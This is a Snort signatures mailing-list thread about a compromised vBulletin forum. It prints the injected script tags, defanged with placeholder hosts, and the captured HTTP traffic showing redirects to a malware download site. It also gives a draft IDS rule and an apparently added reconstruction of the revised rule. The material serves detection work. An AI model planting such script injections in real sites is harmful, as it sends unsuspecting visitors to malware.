Snort mailing list archives

Re: Compromised vBulletin sig


From: Matt Mickel <mmickel () sourcefire com>
Date: Thu, 30 Apr 2015 14:49:42 -0400

Hi, James-

This rule has been reviewed and added to the community ruleset.  I 
removed the PCRE from the committed version and instead used the within 
content modifier.  This made the rule much more efficient while still 
detecting the relevant content.  Thanks so much for your submission.  
Cheers,

Matt Mickel

On 04/16/2015 01:30 PM, James Lay wrote:
Didn't see this in any current ruleset, so I thought I'd post it here.
Yesterday I saw two of these.  Injected into the vBulletin initial page:

<script type="text/javascript"
src="meow://meh[.]com/misc.php?v=364&amp;js=js"></script>
<script type="text/javascript"
src="meow://bleh[.]com/forums/misc.php?v=420&amp;js=js"></script>


#######################################################################################
GET /misc.php?v=364&js=js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer:
meow://meh[.]com/general-cooking/72226-kool-aid-bulk-purchases.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;
Trident/5.0)
Accept-Encoding: gzip, deflate
Host: meh.com
Cookie: __cfduid=bleh; bbsessionhash=bleh; bblastvisit=1429113507;
bblastactivity=0
Cache-Control: max-stale=0
Connection: Keep-Alive
Pragma: no-cache

HTTP/1.1 200 OK
Date: Wed, 15 Apr 2015 15:58:25 GMT
Content-Type: text/html; charset=ISO-8859-1
Transfer-Encoding: chunked
Connection: keep-alive
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Set-Cookie: bblastactivity=0; expires=Thu, 14-Apr-2016 15:58:27 GMT;
path=/
Set-Cookie: bblang_id=en; expires=Thu, 16-Apr-2015 01:58:27 GMT
X-Powered-By: PleskLin
Server: cloudflare-nginx
CF-RAY: 1d78da121f59012e-SJC
Content-Encoding: gzip

document.location='meow://filestore72[.]info/download.php?id=f823cc00'
#######################################################################################

This in turn goes to:

#######################################################################################
GET /download.php?id=f823cc00 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer:
meow://meh[.]com/general-cooking/72226-kool-aid-bulk-purchases.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;
Trident/5.0)
Accept-Encoding: gzip, deflate
Host: filestore72[.]info
Cache-Control: max-stale=0
Connection: Keep-Alive
Pragma: no-cache

HTTP/1.1 302 Moved Temporarily
Server: nginx/1.0.12
Date: Wed, 15 Apr 2015 15:53:40 GMT
Content-Type: text/html
Content-Length: 161
Connection: close
Location:
meow://pdta23sj9kkdl9wwtakzzhf.antalyagunlukkiralik[.]org/index.php?z=Z2xham91PWtuY2h2JnRpbWU9MTUwNDE1MTU0NTI1ODI3MDI4MSZzcmM9NzYmc3VybD1maWxlc3RvcmU3Mi5pbmZvJnNwb3J0PTgwJmtleT0yN0ExMzA0MSZzdXJpPS9kb3dubG9hZC5waHAlM2ZpZD1mODIzY2MwMA==

<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx/1.0.12</center>
</body>
</html>
#######################################################################################


Seems to be old-ish news, but the sig is below:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS
(msg:"SERVER-WEBAPP Compromised vbulletin site";
flow:established,to_server; uricontent:"/misc.php?"; uricontent:"v=";
uricontent:"js=js"; pcre:"/misc.php\x3Fv\x3D[0-9]{3}\x26js\x3Djs/Ui";
reference:url,http://www.vbulletin.com/forum/forum/vbulletin-4/vbulletin-4-questions-problems-and-troubleshooting/4020207-please-help-hacked-vbulletin-redirect-to-filestore72-info;
classtype:bad-unknown; sid:10000156; rev:1;)

As usual, not sure if I have this perfect so anything to improve this
sig would be excellent.  Thank you.

James
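An added reconstruction of the rewrite Matt describes (PCRE dropped, relative `within` check instead), not the rule actually committed to the community ruleset; it assumes Snort 2.9 syntax with the http_uri modifier, reuses James's draft sid with a bumped rev purely as an assumption, and the reference URL is the one from James's draft. Note that `within` counts bytes, not digits, so this version permits zero to three arbitrary bytes between the two strings where the PCRE required exactly three digits.

```snort
# Added reconstruction, not the committed community rule. Both content
# matches are pinned to the normalized URI buffer (http_uri), so the
# fast-pattern matcher carries the load and no regex runs per request.
# "&js=js" is 6 bytes; within:9 requires it to end no more than 9 bytes
# after "/misc.php?v=", i.e. at most 3 bytes (the version digits) between.
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS \
    (msg:"SERVER-WEBAPP Compromised vbulletin site"; \
    flow:established,to_server; \
    content:"/misc.php?v="; http_uri; \
    content:"&js=js"; http_uri; within:9; \
    reference:url,http://www.vbulletin.com/forum/forum/vbulletin-4/vbulletin-4-questions-problems-and-troubleshooting/4020207-please-help-hacked-vbulletin-redirect-to-filestore72-info; \
    classtype:bad-unknown; sid:10000156; rev:2;)
```

Test it against the captured request above before deploying: the URI `/misc.php?v=364&js=js` has exactly 3 bytes between the two anchors, so both the original PCRE and this `within` form fire on it.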

_______________________________________________
Snort-sigs mailing list
Snort-sigs () lists sourceforge net
https://lists.sourceforge.net/lists/listinfo/snort-sigs
http://www.snort.org


Please visit http://blog.snort.org for the latest news about Snort!

